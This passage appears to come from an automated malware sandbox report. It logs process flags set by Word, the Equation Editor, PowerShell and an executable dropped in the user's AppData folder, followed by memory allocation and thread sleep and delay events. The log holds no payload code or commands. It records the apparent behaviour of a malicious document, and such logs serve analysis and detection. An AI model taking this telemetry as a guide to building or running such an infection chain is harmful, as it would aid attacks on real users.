                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeMemory allocated: 350000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeMemory allocated: 24E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeMemory allocated: 470000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeMemory allocated: 65C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeMemory allocated: 6350000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeMemory allocated: 75C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeMemory allocated: 85C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeMemory allocated: 8D60000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeMemory allocated: 9D60000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeMemory allocated: AD60000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeMemory allocated: 250000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeMemory allocated: 24E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeMemory allocated: 360000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1038Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4855Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeWindow / User API: threadDelayed 675Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeWindow / User API: threadDelayed 9135Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3636Thread sleep time: -300000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe TID: 3832Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe TID: 3808Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4020Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4024Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3940Thread sleep time: -922337203685477s >= -30000sJump to behavior
